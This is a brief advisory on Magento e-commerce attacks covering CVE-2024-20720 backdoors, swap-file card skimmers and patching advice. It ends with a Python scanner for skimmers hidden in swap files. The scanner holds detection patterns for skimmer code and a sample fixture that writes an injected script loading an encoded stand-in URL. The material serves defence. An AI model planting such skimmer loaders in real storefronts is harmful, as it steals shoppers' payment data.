Magento, eCommerce Attacks in Progress


Immediate Recommendation for Magento:

Update Software: It is crucial for Magento store owners to update their systems to the latest versions (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7) to patch known vulnerabilities and protect against future attacks.

Malwarebytes (https://www.malwarebytes.com/blog/news/2024/08/hundreds-of-online-stores-hacked-in-new-campaign) is reporting a new campaign or variant. JoT will update as news becomes available. Thanks to the wonderful team at AlienVault and MITRE, these are the relevant ATT&CK IDs:

  • T1059.007 - JavaScript

  • T1598.003 - Spearphishing Link

  • T1185 - Man in the Browser

  • T1059.008 - Network Device CLI

  • T1059.001 - PowerShell

Recent Magento Vulnerabilities and Exploits

  1. CVE-2024-20720: A critical vulnerability identified earlier in 2024, which allows attackers to inject a persistent backdoor into Magento servers. This vulnerability involves manipulating Magento's layout template system and has been exploited to install backdoors and inject malicious payloads, such as fake payment skimmers, into e-commerce websites.

  2. E-skimming Attacks: Threat actors have been using swap files in compromised Magento websites to hide credit card skimmers and harvest payment information. This method allows malware to persist on the server even after cleanup attempts.

  3. Ongoing Malware Campaigns: A new malware campaign has been reported to target e-commerce sites using Adobe's Magento platform. This campaign is designed to steal payment information from online shoppers.

Recommendations for Magento Store Owners

  • Update Software: It is crucial for Magento store owners to update their systems to the latest versions (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7) to patch known vulnerabilities and protect against future attacks.

  • Security Scans: Regularly run security scans, such as the eComscan scanner, to detect hidden backdoors and other indicators of compromise.

  • Restrict Access: Limit access to critical server functions via SSH, FTP, and cPanel to trusted IPs only. Implement website firewalls for additional protection.

  • Monitor for Suspicious Activity: Be vigilant for unusual activity, such as strange orders or unauthorized access attempts, which may indicate a security breach.
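The swap-file skimmer technique above and the "run security scans" recommendation are illustrated by this added detection check (not code from the original post, Malwarebytes, or Magento). It walks a Magento document root for files named like editor swap files and flags any whose contents are web script rather than a genuine Vim swap block; the directory names, file names and skimmer text are constructed sample data, not real indicators.

```python
import re
import tempfile
from pathlib import Path

# Suffixes that belong only to an editor's temporary state and have no business
# in a deployed web root (assumption: the campaign hid its skimmer in such files).
SWAP_SUFFIXES = (".swp", ".swo", ".swn", "~")

# Content that indicates executable web script rather than binary editor state.
SCRIPT_PATTERNS = [
    re.compile(rb"<\?php"),
    re.compile(rb"<script\b", re.I),
    re.compile(rb"\batob\s*\("),
    re.compile(rb"document\.createElement\s*\(\s*['\"]script['\"]"),
    re.compile(rb"\b(cc_number|card_number|cvv|checkout)\b", re.I),
]


def looks_like_vim_swap(data: bytes) -> bool:
    """A real Vim swap file begins with the 'b0VIM' block-zero header."""
    return data.startswith(b"b0VIM")


def suspicious_swap_files(root):
    """Return [(relative_path, [matched patterns])] for swap-named files holding script."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):  # rglob also matches dot-prefixed (hidden) names
        if not path.is_file() or not path.name.endswith(SWAP_SUFFIXES):
            continue
        head = path.read_bytes()[:65536]
        if looks_like_vim_swap(head):
            continue  # genuine editor leftover; untidy in production but not a payload
        hits = [p.pattern.decode() for p in SCRIPT_PATTERNS if p.search(head)]
        if hits:
            findings.append((str(path.relative_to(root)), hits))
    return findings


def build_sample_tree(root):
    """Constructed sample tree: one clean asset, one planted skimmer, one real swap."""
    static = Path(root) / "pub" / "static"
    static.mkdir(parents=True)
    (static / "checkout.js").write_bytes(b"console.log('ok');")
    (static / ".checkout.js.swp").write_bytes(
        b"<script>var s=document.createElement('script');"
        b"s.src=atob('aHR0cDovL2V4YW1wbGUuY29t');</script>")
    (static / ".notes.txt.swp").write_bytes(b"b0VIM 9.0" + b"\x00" * 32)


def scan_sample():
    """Build the constructed tree in a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return suspicious_swap_files(tmp)
```

Point `suspicious_swap_files()` at a real Magento root and review each hit by hand; the pattern list is a starting point, not a complete signature set.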
